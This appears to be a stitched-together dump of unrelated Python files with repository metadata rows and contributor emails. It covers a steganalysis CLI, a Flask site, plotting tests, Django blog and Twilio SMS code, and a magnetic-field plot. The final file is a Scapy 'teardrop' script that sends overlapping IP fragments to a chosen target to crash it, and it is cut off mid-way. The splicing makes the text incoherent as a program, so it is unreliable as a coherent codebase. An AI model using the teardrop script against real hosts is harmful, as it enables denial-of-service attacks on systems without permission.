def embed_message(embed_fn, path, payload, output_dir):
path=utils.absolute_path(path)
# Read filenames
files=[]
if os.path.isdir(path):
for dirpath,_,filenames in os.walk(path):
for f in filenames:
path=os.path.abspath(os.path.join(dirpath, f))
if not utils.is_valid_image(path):
print "Warning, please provide a valid image: ", f
else:
files.append(path)
else:
files=[path]
def embed(path):
X=embed_fn(path, payload)
basename=os.path.basename(path)
dst_path=os.path.join(output_dir, basename)
try:
scipy.misc.toimage(X, cmin=0, cmax=255).save(dst_path)
except Exception, e:
print str(e)
# Process thread pool in batches
batch=1000
for i in xrange(0, len(files), batch):
files_batch = files[i:i+batch]
n_core=cpu_count()
print "Using", n_core, "threads"
pool = ThreadPool(n_core)
results = pool.map(embed, files_batch)
pool.close()
pool.terminate()
pool.join()
"""
for path in files:
I=scipy.misc.imread(path)
X=embed_fn(path, payload)
basename=os.path.basename(path)
dst_path=os.path.join(output_dir, basename)
try:
scipy.misc.toimage(X, cmin=0, cmax=255).save(dst_path)
except Exception, e:
print str(e)
"""
# }}}
# {{{ extract_features()
def extract_features(extract_fn, image_path, ofile):
image_path=utils.absolute_path(image_path)
# Read filenames
files=[]
if os.path.isdir(image_path):
for dirpath,_,filenames in os.walk(image_path):
for f in filenames:
path=os.path.abspath(os.path.join(dirpath, f))
if not utils.is_valid_image(path):
print "Warning, please provide a valid image: ", f
else:
files.append(path)
else:
files=[image_path]
output_file=utils.absolute_path(ofile)
if os.path.isdir(output_file):
print "The provided file is a directory:", output_file
sys.exit(0)
if os.path.exists(output_file):
os.remove(output_file)
def extract_and_save(path):
X = extract_fn(path)
X = X.reshape((1, X.shape[0]))
lock.acquire()
with open(output_file, 'a+') as f_handle:
numpy.savetxt(f_handle, X)
lock.release()
#pool = ThreadPool(cpu_count())
pool = ThreadPool(8)
results = pool.map(extract_and_save, files)
pool.close()
pool.terminate()
pool.join()
"""
for path in files:
X = richmodels.SRM_extract(path)
print X.shape
X = X.reshape((1, X.shape[0]))
with open(sys.argv[3], 'a+') as f_handle:
numpy.savetxt(f_handle, X)
"""
# }}}
# {{{ train_models()
def train_models():
print "-- TRAINING HUGO 0.40 --"
tr_cover='../WORKDIR/DL_TR_RK_HUGO_0.40_db_boss5000_50/A_cover'
tr_stego='../WORKDIR/DL_TR_RK_HUGO_0.40_db_boss5000_50/A_stego'
ts_cover='../WORKDIR/DL_TS_RK_HUGO_0.40_db_boss250_50/SUP/cover'
ts_stego='../WORKDIR/DL_TS_RK_HUGO_0.40_db_boss250_50/SUP/stego'
tr_cover=ts_cover
tr_stego=ts_stego
nn = cnn.GrayScale(tr_cover, tr_stego, ts_cover, ts_stego)
nn.train('models/hugo-0.40.h5')
# }}}
def main():
if len(sys.argv)<2:
print sys.argv[0], "<command>\n"
print "COMMANDS:"
print ""
print " Attacks to LSB replacement:"
print " - spa: Sample Pairs Analysis."
print " - rs: RS attack."
print ""
print " ML-based detectors:"
print " - esvm-predict: Predict using eSVM."
print " - e4s-predict: Predict using EC."
print ""
print " Feature extractors:"
print " - srm: Full Spatial Rich Models."
print " - srmq1: Spatial Rich Models with fixed quantization q=1c."
print ""
print " Embedding simulators:"
print " - lsbr-sim: Embedding using LSB replacement simulator."
print " - lsbm-sim: Embedding using LSB matching simulator."
print " - hugo-sim: Embedding using HUGO simulator."
print " - wow-sim: Embedding using WOW simulator."
print " - s-uniward-sim: Embedding using S-UNIWARD simulator."
print " - hill-sim: Embedding using HILL simulator."
print ""
print " Model training:"
print " - esvm: Ensemble of Support Vector Machines."
print " - e4s: Ensemble Classifiers for Steganalysis."
print " - xu-net: Convolutional Neural Network for Steganalysis."
print ""
print "\n"
sys.exit(0)
if False: pass
# -- ATTACKS --
# {{{ spa
elif sys.argv[1]=="spa":
if len(sys.argv)!=3:
print sys.argv[0], "spa <image>\n"
sys.exit(0)
if not utils.is_valid_image(sys.argv[2]):
print "Please, provide a valid image"
sys.exit(0)
threshold=0.05
bitrate_R=attacks.spa(sys.argv[2], 0)
bitrate_G=attacks.spa(sys.argv[2], 1)
bitrate_B=attacks.spa(sys.argv[2], 2)
if bitrate_R<threshold and bitrate_G<threshold and bitrate_B<threshold:
print "No hiden data found"
sys.exit(0)
if bitrate_R>=threshold:
print "Hiden data found in channel R", bitrate_R
if bitrate_G>=threshold:
print "Hiden data found in channel G", bitrate_G
if bitrate_B>=threshold:
print "Hiden data found in channel B", bitrate_B
sys.exit(0)
# }}}
# {{{ rs
elif sys.argv[1]=="rs":
if len(sys.argv)!=3:
print sys.argv[0], "spa <image>\n"
sys.exit(0)
if not utils.is_valid_image(sys.argv[2]):
print "Please, provide a valid image"
sys.exit(0)
threshold=0.05
bitrate_R=attacks.rs(sys.argv[2], 0)
bitrate_G=attacks.rs(sys.argv[2], 1)
bitrate_B=attacks.rs(sys.argv[2], 2)
if bitrate_R<threshold and bitrate_G<threshold and bitrate_B<threshold:
print "No hiden data found"
sys.exit(0)
if bitrate_R>=threshold:
print "Hiden data found in channel R", bitrate_R
if bitrate_G>=threshold:
print "Hiden data found in channel G", bitrate_G
if bitrate_B>=threshold:
print "Hiden data found in channel B", bitrate_B
sys.exit(0)
# }}}
# -- ML-BASED DETECTORS --
# {{{ esvm
elif sys.argv[1]=="esvm-predict":
if len(sys.argv)!=5:
print sys.argv[0], "esvm-predict <model-file> <feature-extractor> <image/dir>\n"
print "Feature extractors:"
print " - srm: Full Spatial Rich Models."
print " - srmq1: Spatial Rich Models with fixed quantization q=1c."
print ""
sys.exit(0)
model_file=sys.argv[2]
extractor=sys.argv[3]
path=utils.absolute_path(sys.argv[4])
files=[]
if os.path.isdir(path):
for dirpath,_,filenames in os.walk(path):
for f in filenames:
path=os.path.abspath(os.path.join(dirpath, f))
if not utils.is_valid_image(path):
print "Warning, please provide a valid image: ", f
else:
files.append(path)
else:
files=[path]
clf=pickle.load(open(model_file, "r"))
for f in files:
if extractor=="srm": X = richmodels.SRM_extract(f)
if extractor=="srmq1": X = richmodels.SRMQ1_extract(f)
X = X.reshape((1, X.shape[0]))
p = clf.predict_proba(X)
print p
if p[0][0] > 0.5:
print os.path.basename(f), "Cover, probability:", p[0][0]
else:
print os.path.basename(f), "Stego, probability:", p[0][1]
# }}}
# {{{ e4s
elif sys.argv[1]=="e4s-predict":
if len(sys.argv)!=5:
print sys.argv[0], "e4s-predict <model-file> <feature-extractor> <image/dir>\n"
print "Feature extractors:"
print " - srm: Full Spatial Rich Models."
print " - srmq1: Spatial Rich Models with fixed quantization q=1c."
print ""
sys.exit(0)
model_file=sys.argv[2]
extractor=sys.argv[3]
path=utils.absolute_path(sys.argv[4])
files=[]
if os.path.isdir(path):
for dirpath,_,filenames in os.walk(path):
for f in filenames:
path=os.path.abspath(os.path.join(dirpath, f))
if not utils.is_valid_image(path):
print "Warning, please provide a valid image: ", f
else:
files.append(path)
else:
files=[path]
clf=models.Ensemble4Stego()
clf.load(model_file)
for f in files:
if extractor=="srm": X = richmodels.SRM_extract(f)
if extractor=="srmq1": X = richmodels.SRMQ1_extract(f)
X = X.reshape((1, X.shape[0]))
p = clf.predict_proba(X)
print p
if p[0][0] > 0.5:
print os.path.basename(f), "Cover, probability:", p[0][0]
else:
print os.path.basename(f), "Stego, probability:", p[0][1]
# }}}
# -- FEATURE EXTRACTORS --
# {{{ srm
elif sys.argv[1]=="srm":
if len(sys.argv)!=4:
print sys.argv[0], "srm <image/dir> <output-file>\n"
sys.exit(0)
image_path=sys.argv[2]
ofile=sys.argv[3]
extract_features(richmodels.SRM_extract, image_path, ofile)
# }}}
# {{{ srmq1
elif sys.argv[1]=="srmq1":
if len(sys.argv)!=4:
print sys.argv[0], "srm <image/dir> <output-file>\n"
sys.exit(0)
image_path=sys.argv[2]
ofile=sys.argv[3]
extract_features(richmodels.SRMQ1_extract, image_path, ofile)
# }}}
# -- EMBEDDING SIMULATORS --
# {{{ lsbr-sim
elif sys.argv[1]=="lsbr-sim":
if len(sys.argv)!=5:
print sys.argv[0], "lsbr-sim <image/dir> <payload> <output-dir>\n"
sys.exit(0)
embed_message(stegosim.lsbr, sys.argv[2], sys.argv[3], sys.argv[4])
# }}}
# {{{ lsbm-sim
elif sys.argv[1]=="lsbm-sim":
if len(sys.argv)!=5:
print sys.argv[0], "lsbm-sim <image/dir> <payload> <output-dir>\n"
sys.exit(0)
embed_message(stegosim.lsbm, sys.argv[2], sys.argv[3], sys.argv[4])
# }}}
# {{{ hugo-sim
elif sys.argv[1]=="hugo-sim":
if len(sys.argv)!=5:
print sys.argv[0], "hugo-sim <image/dir> <payload> <output-dir>\n"
sys.exit(0)
embed_message(stegosim.hugo, sys.argv[2], sys.argv[3], sys.argv[4])
# }}}
# {{{ wow-sim
elif sys.argv[1]=="wow-sim":
if len(sys.argv)!=5:
print sys.argv[0], "wow-sim <image/dir> <payload> <output-dir>\n"
sys.exit(0)
embed_message(stegosim.wow, sys.argv[2], sys.argv[3], sys.argv[4])
# }}}
# {{{ s-uniward-sim
elif sys.argv[1]=="s-uniward-sim":
if len(sys.argv)!=5:
print sys.argv[0], "s-uniward-sim <image/dir> <payload> <output-dir>\n"
sys.exit(0)
embed_message(stegosim.s_uniward, sys.argv[2], sys.argv[3], sys.argv[4])
# }}}
# {{{ hill-sim
elif sys.argv[1]=="hill-sim":
if len(sys.argv)!=5:
print sys.argv[0], "s-uniward-sim <image/dir> <payload> <output-dir>\n"
sys.exit(0)
embed_message(stegosim.hill, sys.argv[2], sys.argv[3], sys.argv[4])
# }}}
# -- MODEL TRAINING --
# {{{ esvm
elif sys.argv[1]=="esvm":
if len(sys.argv)!=5:
print sys.argv[0], "esvm <cover-fea> <stego-fea> <model-file>\n"
sys.exit(0)
from sklearn.model_selection import train_test_split
cover_fea=sys.argv[2]
stego_fea=sys.argv[3]
model_file=sys.argv[4]
X_cover = pandas.read_csv(cover_fea, delimiter = " ").values
X_stego = pandas.read_csv(stego_fea, delimiter = " ").values
#X_cover=numpy.loadtxt(cover_fea)
#X_stego=numpy.loadtxt(stego_fea)
X=numpy.vstack((X_cover, X_stego))
y=numpy.hstack(([0]*len(X_cover), [1]*len(X_stego)))
X_train, X_val, y_train, y_val = train_test_split(X, y, test_size=0.10)
clf=models.EnsembleSVM()
clf.fit(X_train, y_train)
val_score=clf.score(X_val, y_val)
pickle.dump(clf, open(model_file, "wb"))
print "Validation score:", val_score
# }}}
# {{{ e4s
elif sys.argv[1]=="e4s":
if len(sys.argv)!=5:
print sys.argv[0], "e4s <cover-fea> <stego-fea> <model-file>\n"
sys.exit(0)
from sklearn.model_selection import train_test_split
cover_fea=sys.argv[2]
stego_fea=sys.argv[3]
model_file=sys.argv[4]
X_cover = pandas.read_csv(cover_fea, delimiter = " ").values
X_stego = pandas.read_csv(stego_fea, delimiter = " ").values
#X_cover=numpy.loadtxt(cover_fea)
#X_stego=numpy.loadtxt(stego_fea)
X=numpy.vstack((X_cover, X_stego))
y=numpy.hstack(([0]*len(X_cover), [1]*len(X_stego)))
X_train, X_val, y_train, y_val = train_test_split(X, y, test_size=0.10)
clf=models.Ensemble4Stego()
clf.fit(X_train, y_train)
val_score=clf.score(X_val, y_val)
clf.save(model_file)
print "Validation score:", val_score
# }}}
# {{{ xu-net
elif sys.argv[1]=="xu-net":
if len(sys.argv)!=5:
print sys.argv[0], "xu-net <cover-dir> <stego-dir> <model-name>\n"
sys.exit(0)
cover_dir=sys.argv[2]
stego_dir=sys.argv[3]
model_name=sys.argv[4]
net = models.XuNet()
net.train(cover_dir, stego_dir, val_size=0.10, name=model_name)
#print "Validation score:", val_score
# }}}
else:
print "Wrong command!"
if sys.argv[1]=="train-models":
train_models()
if __name__ == "__main__":
main()
| [
"dlerch@gmail.com"
] | dlerch@gmail.com |
b4fe0c005b0e338604ba89b0d2ea585deaed9afa | 9aadbeff047dc7b4202db390de8eb32a2ad64669 | /flask-website/app.py | 3beeafc3f139c01b9ad92b87034dd51c94ab24ae | [
"MIT"
] | permissive | MLH-Fellowship/Dakshina-Gina | 1e851a319f44a0368c3eecd0827b403fdf6ba5a0 | 71b7ccc74c9699769f71a47b0d2c9fcb6b1b4655 | refs/heads/master | 2023-06-11T01:55:30.930979 | 2021-06-11T23:28:37 | 2021-06-11T23:28:37 | 375,489,248 | 0 | 1 | MIT | 2021-06-11T23:28:38 | 2021-06-09T21:05:50 | Python | UTF-8 | Python | false | false | 477 | py | from dotenv import load_dotenv
from flask import Flask, render_template
load_dotenv()
app = Flask(__name__)
@app.route('/')
def hello():
title = "Name's Portfolio"
return render_template("index.html", title=title)
@app.route('/about')
def about():
return render_template("about.html")
@app.route('/experience')
def experience():
return render_template("experience.html")
@app.route('/projects')
def projects():
return render_template("projects.html")
| [
"dakshinabp@berkeley.edu"
] | dakshinabp@berkeley.edu |
d10ddb39438c9ea14084f6d4488f312ad7e49a26 | f307f0c0cd2c3241be7b7115219c1c161e3f7f9e | /tests/test_plotter.py | 520d10e431e475ba64b851d9b10aeed5dff252b6 | [
"Apache-2.0"
] | permissive | freedomtan/trappy | 0471250a5558b50b946365d8a62c91d44e1620a0 | 3f573b07592e3d5f423d47d31ac4650fc9f09125 | refs/heads/master | 2020-05-20T18:31:47.019077 | 2015-11-24T02:04:55 | 2015-11-24T02:05:07 | 46,760,363 | 0 | 0 | null | 2015-11-24T01:58:46 | 2015-11-24T01:58:45 | null | UTF-8 | Python | false | false | 4,520 | py | # Copyright 2015-2015 ARM Limited
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import unittest
import matplotlib
import pandas as pd
import tempfile
import os
from test_thermal import BaseTestThermal
import trappy
class TestPlotter(BaseTestThermal):
"""No Bombing testcases for plotter"""
def __init__(self, *args, **kwargs):
super(TestPlotter, self).__init__(*args, **kwargs)
def test_plot_no_pivot(self):
"""Tests LinePlot with no pivot"""
run1 = trappy.Run(name="first")
l = trappy.LinePlot(run1, trappy.thermal.Thermal, column="temp")
l.view(test=True)
def test_plot_multi_run(self):
"""Tests LinePlot with no Pivot multi runs"""
run1 = trappy.Run(name="first")
run2 = trappy.Run(name="second")
l = trappy.LinePlot(
[run1, run2], trappy.thermal.Thermal, column="temp")
l.view(test=True)
def test_plot_multi(self):
"""Tests LinePlot with no Pivot multi attrs"""
run1 = trappy.Run(name="first")
run2 = trappy.Run(name="second")
l = trappy.LinePlot([run1,
run2],
[trappy.thermal.Thermal,
trappy.thermal.ThermalGovernor],
column=["temp",
"power_range"])
l.view(test=True)
def test_plot_filter(self):
"""Tests LinePlot with no Pivot with filters"""
run1 = trappy.Run(name="first")
run2 = trappy.Run(name="second")
l = trappy.LinePlot([run1,
run2],
[trappy.cpu_power.CpuOutPower],
column=["power"],
filters={"cdev_state": [1]})
l.view(test=True)
def test_plot_pivot(self):
"""Tests LinePlot with Pivot"""
run1 = trappy.Run(name="first")
l = trappy.LinePlot(
run1,
trappy.thermal.Thermal,
column="temp",
pivot="thermal_zone")
l.view(test=True)
def test_plot_multi_run_pivot(self):
"""Tests LinePlot with Pivot multi runs"""
run1 = trappy.Run(name="first")
run2 = trappy.Run(name="second")
l = trappy.LinePlot(
[run1, run2], trappy.cpu_power.CpuOutPower, column="power", pivot="cpus")
l.view(test=True)
def test_plot_multi_pivot(self):
"""Tests LinePlot with Pivot with multi attrs"""
run1 = trappy.Run(name="first")
run2 = trappy.Run(name="second")
l = trappy.LinePlot([run1,
run2],
[trappy.cpu_power.CpuInPower,
trappy.cpu_power.CpuOutPower],
column=["dynamic_power",
"power"],
pivot="cpus")
l.view(test=True)
def test_plot_multi_pivot_filter(self):
"""Tests LinePlot with Pivot and filters"""
run1 = trappy.Run(name="first")
run2 = trappy.Run(name="second")
l = trappy.LinePlot(
run1,
trappy.cpu_power.CpuInPower,
column=[
"dynamic_power",
"load1"],
filters={
"cdev_state": [
1,
0]},
pivot="cpus")
l.view(test=True)
def test_plot_savefig(self):
"""Tests plotter: savefig"""
run1 = trappy.Run(name="first")
run2 = trappy.Run(name="second")
l = trappy.LinePlot(
run1,
trappy.cpu_power.CpuInPower,
column=[
"dynamic_power",
"load1"],
filters={
"cdev_state": [
1,
0]},
pivot="cpus")
png_file = tempfile.mktemp(dir="/tmp", suffix=".png")
l.savefig(png_file)
self.assertTrue(os.path.isfile(png_file))
os.remove(png_file)
| [
"javi.merino@arm.com"
] | javi.merino@arm.com |
07a1fe23a71e5aee8437f5a0bfa37ca7243e764c | 5d914ecf9893756183154d0c7aac8201ef82d262 | /main/migrations/0005_auto_20180728_1458.py | bb798e7de807eff1352917e89722442a1e2101a6 | [] | no_license | devxtechnologies/ams | 7f4b7c5ab035e35cb60fd17cc62a1138d686fd5d | 48836fc7a7143d6d0043a5afbcd24adec5212a59 | refs/heads/master | 2022-12-12T14:58:03.120199 | 2018-10-19T19:02:52 | 2018-10-19T19:02:52 | 146,030,630 | 1 | 1 | null | 2022-12-08T02:22:53 | 2018-08-24T19:14:04 | CSS | UTF-8 | Python | false | false | 608 | py | # -*- coding: utf-8 -*-
# Generated by Django 1.11.14 on 2018-07-28 14:58
from __future__ import unicode_literals
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [("main", "0004_changestatus")]
operations = [
migrations.AlterField(
model_name="absentees",
name="attendance",
field=models.ForeignKey(
on_delete=django.db.models.deletion.CASCADE,
related_name="absentee",
to="main.Attendance",
),
)
]
| [
"amoghsk279@gmail.com"
] | amoghsk279@gmail.com |
cd9fc6a781e6443c701bace03c219fcdc0d88d96 | 98e00c48dc0ec205b6524f025791a9367a657e13 | /step12.py | 21fad4ab7b026901a4048423734036e3a6e52060 | [] | no_license | mextier/PyStepikC431 | b111d4da586f8392959850f42935f19f7e007702 | 5e2d4afca95d8f68552206defbc1b46ae6b92bbc | refs/heads/master | 2021-09-17T21:55:43.970377 | 2018-07-05T18:21:13 | 2018-07-05T18:21:13 | 115,948,777 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 227 | py | n = int(input())
while n!=1:
print(str(n),'',end='')
n = n//2 if n%2==0 else 1+3*n
print(n)
l = [int(input())]
while l[-1:][0]!=1:
l.append(l[-1]//2 if l[-1]%2==0 else 1+3*l[-1])
print(" ".join(str(c) for c in l))
| [
"mextier@gmail.com"
] | mextier@gmail.com |
1aa2a0dc21caeb8dd6b71e72c95ab63ad932706f | 5f27720d72bf6fa609ccbf04ef9d164d8bf80e24 | /app/models.py | 50da83ffe619dd8e1a289c17cac953962cdc5e90 | [] | no_license | cinjon/hintofdope | 1d02aac2b941d5573cce323f119ddd423235db8a | ac70660cc05961f21a6411e8a6a86f56ea81ec95 | refs/heads/master | 2021-01-19T06:06:01.959849 | 2015-11-28T20:41:05 | 2015-11-28T20:41:05 | 40,025,116 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 5,400 | py | from app import db
from app import utility
from app import config
from app import flask_app as fapp
import random
import os
import datetime
from twilio.rest import TwilioRestClient
import message_options
from flask.ext.script import Command
class Phone(db.Model):
id = db.Column(db.Integer, primary_key=True)
phone_string = db.Column(db.String(25)) #International.
creation_time = db.Column(db.DateTime)
messages = db.relationship('Message', lazy='dynamic', backref='phone')
deleted = db.Column(db.Boolean)
sent_intro = db.Column(db.Boolean)
def __init__(self, phone_string):
self.phone_string = phone_string
self.creation_time = utility.get_time()
self.deleted = False
self.sent_intro = False
def delete(self):
self.deleted = True
db.session.commit()
def send_intro(self):
selection = get_selection(self, message_options.i)
message = create_message(self.id, selection=selection)
if message and message.send(self):
self.sent_intro = True
db.session.commit()
else:
fapp.logger.debug('Phone %s had intro send fail' % self.phone_string)
def send_growth(self):
selection = get_selection(self, message_options.g)
message = create_message(self.id, selection=selection)
if not message.send(self):
fapp.logger.debug('Phone %s had growth send fail.' % self.phone_string)
def send_reintro(self):
selection = get_selection(self, message_options.r)
message = create_message(self.id, selection=selection)
if not message.send(self):
fapp.logger.debug('Phone %s had re-intro send fail' % self.phone_string)
def delete_phone(numstr):
if not numstr:
return False
if len(numstr) == 12 and numstr[:2] == '+1':
phone = Phone.query.filter(Phone.phone_string == numstr[2:]).first()
if not phone:
return False
phone.deleted = True
db.session.commit()
return True
else: # intl #
return False
def get_or_create_phone(phone_string, commit=True):
if Phone.query.filter(Phone.phone_string == phone_string).count() > 0:
return True, Phone.query.filter(Phone.phone_string == phone_string).first()
return False, create_phone(phone_string, commit)
def create_phone(phone_string, commit=True):
phone = Phone(phone_string)
if commit:
db.session.add(phone)
db.session.commit()
return phone
class Message(db.Model):
id = db.Column(db.Integer, primary_key=True)
selection = db.Column(db.Integer) # index of message in message_options
creation_time = db.Column(db.DateTime)
sent_time = db.Column(db.DateTime)
phone_id = db.Column(db.Integer, db.ForeignKey('phone.id'))
def __init__(self, selection):
self.selection = selection
self.creation_time = utility.get_time()
def get_body(self, signature=True):
body = message_options.options[self.selection]['body']
if signature:
body += '\n- Hint Of Dope'
return body
def send(self, phone=None):
phone = phone or Phone.query.get(self.phone_id)
body = self.get_body()
if send_by_twilio(phone.phone_string, body):
self.sent_time = utility.get_time()
db.session.commit()
return True
return False
def create_message(phone_id, selection=None, commit=True):
phone = Phone.query.get(phone_id)
if not phone or phone.deleted:
return
if selection == None:
selection = get_selection(phone)
message = Message(selection)
phone.messages.append(message)
if commit:
db.session.add(message)
db.session.commit()
return message
def filter_options(ty):
return [option for option in message_options.options if option['type'] == ty]
def get_option_type(messages):
return message_options.d
def get_selection(phone, option_type=None):
"""
Gets the next selection for the given phone. Always gets a Dope msg.
"""
def check_selection(option_type, selection_type):
if option_type == None:
return selection_type != message_options.i and \
selection_type != message_options.r and \
selection_type != message_options.g
return selection_type == option_type
messages = phone.messages.all() or []
message_selections = [m.selection for m in messages]
if not option_type:
option_type = get_option_type(messages)
counts = sorted(
[{'index':index, 'count':message_selections.count(index)} for index, option in enumerate(message_options.options) if check_selection(option_type, option['type'])],
key = lambda message: message.get('count'))
counts = [c for c in counts if c['count'] == counts[0]['count']]
random.shuffle(counts)
return counts[0]['index']
from_phone="+12132634705"
twilio_client = TwilioRestClient(config.TWILIO_ACCOUNT_SID, config.TWILIO_AUTH_TOKEN)
def send_by_twilio(to_phone, message):
try:
twilio_client.messages.create(
to=to_phone,
from_=from_phone,
body=message,
# status_callback=config.baseurl+'/twilio_callback'
)
return True
except Exception, e:
fapp.logger.debug(e)
return False
| [
"cinjon.resnick@gmail.com"
] | cinjon.resnick@gmail.com |
0ae56df89f2a55dee86afc1a502bebdfb672e566 | aca1e6d0147fb49bda7bc3f280776ecb26373fbf | /run.py | 4e35ceec41cf7c5d85563a1c5a97d605b3bd98ae | [] | no_license | kltong/learning-python | e5f88b9208afc91b1f40708095614f3ddf62aaed | 41d9192649f42ce4c7fcf302a036392b06a49b98 | refs/heads/master | 2020-03-20T04:42:46.073763 | 2018-06-13T09:28:26 | 2018-06-13T09:28:26 | 137,192,319 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 152 | py | #! /usr/bin/python
# coding=utf-8
"""
第一行指明解释器位置,感叹号不可少
第二行指定文件编码
"""
print 'auto find interpreter'
| [
"kelangtong@gmail.com"
] | kelangtong@gmail.com |
c9ae5c644324ecdb021be96d94ce26419f3e607b | 09c59407cbb9717aff4dcdce3706a25134257844 | /M+2018figs/fig3.py | fc1f3b1d52b7413d480e8d43e3c6791861833767 | [
"MIT"
] | permissive | mwest007/mhd-ray-tracing | 2c48b0105ad63f3119c1e8ab731583733afc122c | bfa0ee0a2127ded8e602aba88f5af9fc3d8e38bb | refs/heads/master | 2022-03-31T06:56:00.185085 | 2019-06-07T16:13:51 | 2019-06-07T16:13:51 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,646 | py | # Path relative to main directory
import sys
sys.path.append('../')
# Create a tmp file to pass the chosen field class to wkb class
f = open('tmp_config.py','w')
f.write('fieldclass=\'Dipole3dCase1\'')
f.close()
# Import
import matplotlib.pyplot as plt
import matplotlib.colors
import wkb_fast_zerobeta as wkb
import numpy as np
import math
# Remove the f
import os
os.remove('tmp_config.py')
from magnetic_field import Dipole3dCase1 as magnetic_field
# Plot fieldlines as contours of the flux functon
y0 = -2.01
y1 = 2.01
z0 = 0.
z1 = 3.01
ny = 4*100
nz = ny
gy = np.linspace(y0,y1,ny)
gz = np.linspace(z0,z1,nz)
ax = np.zeros([ny,nz])
speed = np.zeros([ny,nz])
for iz in range(0,nz-1):
for iy in range(0,ny-1):
b = magnetic_field(0.0,gy[iy], gz[iz])
ax[iz,iy] = b.ax
speed[iz,iy] = b.abs
#plt.rcParams['contour.negative_linestyle'] = 'solid'
plt.contour(gy,gz,ax,levels=[0],colors='red')
#plt.contourf(gy,gz,speed,levels=[0.,0.1],colors='blue')
#plt.contourf(gy,gz,speed,levels=[0.1,0.5],colors='lime')
#plt.contourf(gy,gz,speed,levels=[0.5,1.2],colors='yellow')
#plt.contourf(gy,gz,speed,levels=[1.2,10.],colors='orange')
#plt.contourf(gy,gz,speed,levels=[10,1000],colors='black')
listofcolors=['blue','lime','yellow','orange','black']
plt.contourf(gy,gz,speed,levels=[0.,0.1,0.5,1.2,10.,1000],colors=listofcolors)
#plt.colorbar(ticks=[0.,0.1,0.5,1.2,10.],label='va',orientation='horizontal')
#plt.colorbar(ticks=[0.,0.1,0.5,1.2,10.],label='$v_A$')
plt.colorbar(ticks=[0.,0.1,0.5,1.2,10.])
plt.xlabel('y')
plt.ylabel('z')
plt.title('$v_A$')
plt.axis([-2,2, 0,3])
plt.savefig('fig3.png',dpi=300)
#plt.show()
| [
"jonathanthurgood1989@gmail.com"
] | jonathanthurgood1989@gmail.com |
6e095dfc4bde23ec68cf1de2a2e2a66d10092036 | 820f0e4f861eeda5700d149dabe77afe9a8fd5ee | /blog/views.py | d5b8d926594c64906ac1d94b2eb74b2442553047 | [] | no_license | aldnav/old_aldnav_website | b6cd026ef6ce38763b6f63c11880b64d574bd8d4 | 0c465055607646cb154bb9ba38de79356d6999c6 | refs/heads/master | 2023-04-05T07:31:47.887944 | 2014-04-16T03:32:06 | 2014-04-16T03:32:06 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,819 | py | from django.shortcuts import render, get_object_or_404
from django.http import HttpResponse
from django.template import RequestContext, loader
from blog.models import Post, Tag, Like
def index(request):
latest_post_list = Post.objects.all().order_by('-pub_date')[:5]
tags_list = Tag.objects.all().order_by('name')
template = loader.get_template('posts/index.html')
context = RequestContext(request,{
'latest_post_list': latest_post_list,
'tags_list': tags_list,
})
return HttpResponse(template.render(context))
def detail(request, post_id):
post = get_object_or_404(Post, pk=post_id)
num_likes = post.like_set.all().count()
return render(request, 'posts/detail.html', {'post': post, 'likes':num_likes})
def article(request, post_slug):
post = get_object_or_404(Post, slug=post_slug)
tags = Tag.objects.filter(posts__id__exact=post.id)
return render(request, 'posts/detail.html', {'post': post, 'tags': tags})
def results(request, post_id):
return HttpResponse("You're looking at the results of post %s." % post_id)
def like(request, post_slug):
post = get_object_or_404(Post, slug=post_slug)
return render(request, 'posts/detail.html', {'post': post})
# def like(request, post_slug):
# post = get_object_or_404(Post, slug=post_slug)
# new_like, created = Like.objects.get_or_create(user=get_client_ip(request))
# if created:
# return render(request, 'posts/detail.html', {'post': post})
# else:
# return render(request, 'posts/detail.html', {'post': post})
#
# def get_client_ip(request):
# x_forwarded_for = request.META.get('HTTP_X_FORWARDED_FOR')
# if x_forwarded_for:
# ip = x_forwarded_for.split(',')[0]
# else:
# ip = request.META.get('REMOTE_ADDR')
# return ip | [
"aldrinnavarro16@gmail.com"
] | aldrinnavarro16@gmail.com |
375f9340d1d501448cc0ffef1a88f203143cf815 | e046ee15fbb1425294baa4e34b343c21a6ab42e6 | /teardrop.py | 9a4861e835303dd8b03b2dd014d6e9dea283e219 | [
"MIT"
] | permissive | contriveone/neonetsecproj | 2b94ff6073657a6ada1eda27480fd8b9ab8f6c43 | fb1b0083d2a1bf06da1d4edf8738aa7d69eec03b | refs/heads/master | 2021-09-08T02:24:34.696484 | 2018-03-05T23:32:56 | 2018-03-05T23:32:56 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,399 | py | #!/usr/bin/env python
import sys
from scapy.all import *
total = len(sys.argv)
if total != 3:
print ("Performs teardrop attack from Kali Linux")
print (" ")
print ("Usage: ./tear TARGET-IP ATTACK-CODE")
print (" Attack Codes:")
print (" 0: small payload (36 bytes), 2 packets, offset=3x8 bytes")
print (" 1: large payload (1300 bytes), 2 packets, offset=80x8 bytes")
print (" 2: large payload (1300 bytes), 12 packets, offset=80x8 bytes")
print (" 3: large payload (1300 bytes), 2 packets, offset=3x8 bytes")
print (" 4: large payload (1300 bytes), 2 packets, offset=10x8 bytes")
target=str(sys.argv[1])
attack=sys.argv[2]
print ('Attacking target ' + target + ' with attack ' + attack)
if attack == '0':
print ("Using attack 0")
size=36
offset=3
load1="\x00"*size
i=IP()
i.dst=target
i.flags="MF"
i.proto=17
size=4
offset=18
load2="\x00"*size
j=IP()
j.dst=target
j.flags=0
j.proto=17
j.frag=offset
# test with a upd package
# u = UDP(dport=53)
# print ('length of arbitrary payload is equal with udp pack' if u.__len__() == load1.__len__() else 'they are not equal')
send(i/load1)
send(j/load2)
elif attack == '1':
print ("Using attack 1")
size=1300
offset=80
load="A"*size
i=IP()
i.dst=target
i.flags="MF"
i.proto=17
j=IP()
j.dst=target
j.flags=0
j.proto=17
j.frag=offset
send(i/load)
send(j/load)
elif attack == '2':
print ("Using attack 2")
print ("Attacking with attack 2")
